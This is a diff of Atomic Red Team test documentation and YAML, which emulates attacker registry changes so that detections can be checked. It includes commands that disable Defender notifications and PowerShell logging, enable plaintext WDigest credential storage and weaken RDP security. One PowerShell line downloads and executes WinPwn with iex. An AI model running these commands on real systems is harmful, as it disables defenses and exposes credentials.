+## Atomic Test #14 - Disable Windows Shutdown Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/

@@ -624,7 +659,7 @@ reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policie
 <br/>
 <br/>

-## Atomic Test #14 - Disable Windows LogOff Button
+## Atomic Test #15 - Disable Windows LogOff Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2

@@ -659,7 +694,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #15 - Disable Windows Change Password Feature
+## Atomic Test #16 - Disable Windows Change Password Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
 See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah

@@ -692,7 +727,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #16 - Disable Windows Lock Workstation Feature
+## Atomic Test #17 - Disable Windows Lock Workstation Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
 See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

@@ -725,7 +760,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature
+## Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -759,7 +794,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #18 - Activate Windows NoRun Group Policy Feature
+## Atomic Test #19 - Activate Windows NoRun Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -793,7 +828,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #19 - Activate Windows NoFind Group Policy Feature
+## Atomic Test #20 - Activate Windows NoFind Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -827,7 +862,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature
+## Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -861,7 +896,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature
+## Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -895,7 +930,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #22 - Activate Windows NoClose Group Policy Feature
+## Atomic Test #23 - Activate Windows NoClose Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
@@ -929,7 +964,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature
+## Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -963,7 +998,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature
+## Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -997,7 +1032,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
+## Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1031,7 +1066,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #26 - Hide Windows Clock Group Policy Feature
+## Atomic Test #27 - Hide Windows Clock Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1065,7 +1100,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #27 - Windows HideSCAHealth Group Policy Feature
+## Atomic Test #28 - Windows HideSCAHealth Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1099,7 +1134,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #28 - Windows HideSCANetwork Group Policy Feature
+## Atomic Test #29 - Windows HideSCANetwork Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1133,7 +1168,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #29 - Windows HideSCAPower Group Policy Feature
+## Atomic Test #30 - Windows HideSCAPower Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect.
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1167,7 +1202,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #30 - Windows HideSCAVolume Group Policy Feature
+## Atomic Test #31 - Windows HideSCAVolume Group Policy Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
 Take note that some Group Policy changes might require a restart to take effect..
 See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
@@ -1201,7 +1236,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 <br/>
 <br/>

-## Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry
+## Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry
 Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
 See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

@@ -1236,7 +1271,7 @@ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v S
 <br/>
 <br/>

-## Atomic Test #32 - Windows Powershell Logging Disabled
+## Atomic Test #33 - Windows Powershell Logging Disabled
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
 see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging

@@ -1275,7 +1310,7 @@ reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v
 <br/>
 <br/>

-## Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network
+## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network
 Modify the registry to allow a driver, service, to persist in Safe Mode.
 see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
 Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
@@ -1309,7 +1344,7 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMod
 <br/>
 <br/>

-## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network
+## Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network
 Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
 see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
 Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
@@ -1343,7 +1378,7 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMod
 <br/>
 <br/>

-## Atomic Test #35 - Disable Windows Toast Notifications
+## Atomic Test #36 - Disable Windows Toast Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

@@ -1376,7 +1411,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotif
 <br/>
 <br/>

-## Atomic Test #36 - Disable Windows Security Center Notifications
+## Atomic Test #37 - Disable Windows Security Center Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

@@ -1409,7 +1444,7 @@ reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveS
 <br/>
 <br/>

-## Atomic Test #37 - Suppress Win Defender Notifications
+## Atomic Test #38 - Suppress Win Defender Notifications
 Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

@@ -1442,7 +1477,7 @@ reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration"
 <br/>
 <br/>

-## Atomic Test #38 - Allow RDP Remote Assistance Feature
+## Atomic Test #39 - Allow RDP Remote Assistance Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
 user to rdp connect on the targeted machine.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
@@ -1476,7 +1511,7 @@ reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGe
 <br/>
 <br/>

-## Atomic Test #39 - NetWire RAT Registry Key Creation
+## Atomic Test #40 - NetWire RAT Registry Key Creation
 NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
 See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/

@@ -1513,7 +1548,7 @@ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
 <br/>
 <br/>

-## Atomic Test #40 - Ursnif Malware Registry Key Creation
+## Atomic Test #41 - Ursnif Malware Registry Key Creation
 Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
 More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/

@@ -1547,7 +1582,7 @@ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A
 <br/>
 <br/>

-## Atomic Test #41 - Terminal Server Client Connection History Cleared
+## Atomic Test #42 - Terminal Server Client Connection History Cleared
 The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer

 **Supported Platforms:** Windows
@@ -1592,7 +1627,7 @@ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "
 <br/>
 <br/>

-## Atomic Test #42 - Disable Windows Error Reporting Settings
+## Atomic Test #43 - Disable Windows Error Reporting Settings
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
 encounter in specific application or process.
 See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
@@ -1628,7 +1663,7 @@ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v Disabl
 <br/>
 <br/>

-## Atomic Test #43 - DisallowRun Execution Of Certain Applications
+## Atomic Test #44 - DisallowRun Execution Of Certain Applications
 Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
 using security product.

@@ -1665,7 +1700,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
 <br/>
 <br/>

-## Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt
+## Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt
 Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.

 See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
@@ -1699,7 +1734,7 @@ reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAd
 <br/>
 <br/>

-## Atomic Test #45 - Mimic Ransomware - Enable Multiple User Sessions
+## Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions
 This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
 See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)

@@ -1732,7 +1767,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon
 <br/>
 <br/>

-## Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per User
+## Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User
 This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
 See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)

@@ -1765,7 +1800,7 @@ reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSes
 <br/>
 <br/>

-## Atomic Test #47 - Event Viewer Registry Modification - Redirection URL
+## Atomic Test #48 - Event Viewer Registry Modification - Redirection URL
 Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.

 **Supported Platforms:** Windows
@@ -1802,7 +1837,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>
 <br/>

-## Atomic Test #48 - Event Viewer Registry Modification - Redirection Program
+## Atomic Test #49 - Event Viewer Registry Modification - Redirection Program
 Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.

 **Supported Platforms:** Windows
@@ -1839,7 +1874,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>
 <br/>

-## Atomic Test #49 - Enabling Remote Desktop Protocol via Remote Registry
+## Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry
 Enabling RDP through remote registry.

 **Supported Platforms:** Windows
@@ -1871,7 +1906,7 @@ reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-T
 <br/>
 <br/>

-## Atomic Test #50 - Disable Win Defender Notification
+## Atomic Test #51 - Disable Win Defender Notification
 Disable Win Defender Notification. Redline is using this to disable this win defender feature.

 **Supported Platforms:** Windows
@@ -1903,7 +1938,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notif
 <br/>
 <br/>

-## Atomic Test #51 - Disable Windows OS Auto Update
+## Atomic Test #52 - Disable Windows OS Auto Update
 Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.

 **Supported Platforms:** Windows
@@ -1935,7 +1970,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUp
 <br/>
 <br/>

-## Atomic Test #52 - Disable Windows Auto Reboot for current logon user
+## Atomic Test #53 - Disable Windows Auto Reboot for current logon user
 Disable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.

 **Supported Platforms:** Windows
@@ -1967,7 +2002,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRe
 <br/>
 <br/>

-## Atomic Test #53 - Windows Auto Update Option to Notify before download
+## Atomic Test #54 - Windows Auto Update Option to Notify before download
 Windows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.

 **Supported Platforms:** Windows
@@ -1999,7 +2034,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOption
 <br/>
 <br/>

-## Atomic Test #54 - Do Not Connect To Win Update
+## Atomic Test #55 - Do Not Connect To Win Update
 Do Not Connect To Win Update. Redline is using this as part of its defense evasion.

 **Supported Platforms:** Windows
@@ -2031,7 +2066,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnec
 <br/>
 <br/>

-## Atomic Test #55 - Tamper Win Defender Protection
+## Atomic Test #56 - Tamper Win Defender Protection
 Tamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry. 
 Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that 
 tries to tamper this Win Defender feature settings.
@@ -2065,7 +2100,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection
 <br/>
 <br/>

-## Atomic Test #56 - Snake Malware Registry Blob
+## Atomic Test #57 - Snake Malware Registry Blob
 The following Atomic Test creates a registry blob in HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds, which is related to Snake Malware. Per the report, upon execution, Snake's WerFault.exe will attempt to decrypt an encrypted blob within the Windows
 registry that is typically found at HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds. The encrypted data includes the AES key, IV, and path that is used to find and decrypt the file containing Snake's kernel driver and kernel driver loader.

@@ -2098,7 +2133,7 @@ $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemPropert
 <br/>
 <br/>

-## Atomic Test #57 - Allow Simultaneous Download Registry
+## Atomic Test #58 - Allow Simultaneous Download Registry
 A registry modification to allow Simultaneous download in the system.

 **Supported Platforms:** Windows
@@ -2132,7 +2167,7 @@ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
 <br/>
 <br/>

-## Atomic Test #58 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd
+## Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd
 This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
 To verify the effects of the test:
 1. Open the Registry Editor (regedit.exe).
@@ -2174,7 +2209,7 @@ reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Se
 <br/>
 <br/>

-## Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
+## Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
 This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings. 
 To verify the effects of the test:
 1. Open the Registry Editor (regedit.exe).
@@ -2218,7 +2253,7 @@ Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
 <br/>
 <br/>

-## Atomic Test #60 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.
+## Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.
 Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data.
 See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).

@@ -2251,7 +2286,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "All
 <br/>
 <br/>

-## Atomic Test #61 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
+## Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
 Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks.
 See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).

@@ -2284,7 +2319,7 @@ reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /
 <br/>
 <br/>

-## Atomic Test #62 - Scarab Ransomware Defense Evasion Activities
+## Atomic Test #63 - Scarab Ransomware Defense Evasion Activities
 Scarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues.
 [Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)

@@ -2317,7 +2352,7 @@ reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\
 <br/>
 <br/>

-## Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry
+## Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry
 A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation

 **Supported Platforms:** Windows
@@ -2349,7 +2384,7 @@ reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Serv
 <br/>
 <br/>

-## Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry
+## Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry
 A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation

 **Supported Platforms:** Windows
@@ -2381,7 +2416,7 @@ reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Serv
 <br/>
 <br/>

-## Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)
+## Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)
 A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. 
 This technique was seen in DarkGate malware as part of its installation.

@@ -2414,7 +2449,7 @@ reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI
 <br/>
 <br/>

-## Atomic Test #66 - Enable Proxy Settings
+## Atomic Test #67 - Enable Proxy Settings
 A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.

 **Supported Platforms:** Windows
@@ -2446,7 +2481,7 @@ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Pr
 <br/>
 <br/>

-## Atomic Test #67 - Set-Up Proxy Server
+## Atomic Test #68 - Set-Up Proxy Server
 A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.

 **Supported Platforms:** Windows
@@ -2478,7 +2513,7 @@ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
 <br/>
 <br/>

-## Atomic Test #68 - RDP Authentication Level Override
+## Atomic Test #69 - RDP Authentication Level Override
 A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.

 **Supported Platforms:** Windows
@@ -49,6 +49,20 @@ atomic_tests:
      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
    name: command_prompt
    elevation_required: true
+- name: Use Powershell to Modify registry to store logon credentials
+  auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+  description: |
+    Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+    Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '1' -ErrorAction Ignore
+    cleanup_command: |
+      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '0' -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
 - name: Add domain to Trusted sites Zone
  auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
  description: |
@@ -8,6 +8,8 @@

 - [Atomic Test #2 - WinPwn - printercheck](#atomic-test-2---winpwn---printercheck)

+- [Atomic Test #3 - Peripheral Device Discovery via fsutil](#atomic-test-3---peripheral-device-discovery-via-fsutil)
+

 <br/>

@@ -72,4 +74,32 @@ printercheck -noninteractive -consoleoutput



+<br/>
+<br/>
+
+## Atomic Test #3 - Peripheral Device Discovery via fsutil
+Performs pheripheral device discovery utilizing fsutil to list all drives.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 424e18fd-48b8-4201-8d3a-bf591523a686
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+fsutil fsinfo drives
+```
+
+
+
+
+
+
 <br/>
@@ -23,4 +23,13 @@ atomic_tests:
      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      printercheck -noninteractive -consoleoutput
-    name: powershell
+    name: powershell
+- name: Peripheral Device Discovery via fsutil
+  auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+  description: Performs pheripheral device discovery utilizing fsutil to list all drives.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      fsutil fsinfo drives
+    name: command_prompt
@@ -16,6 +16,8 @@ When an adversary would instead use a duplicated token to create a new process r

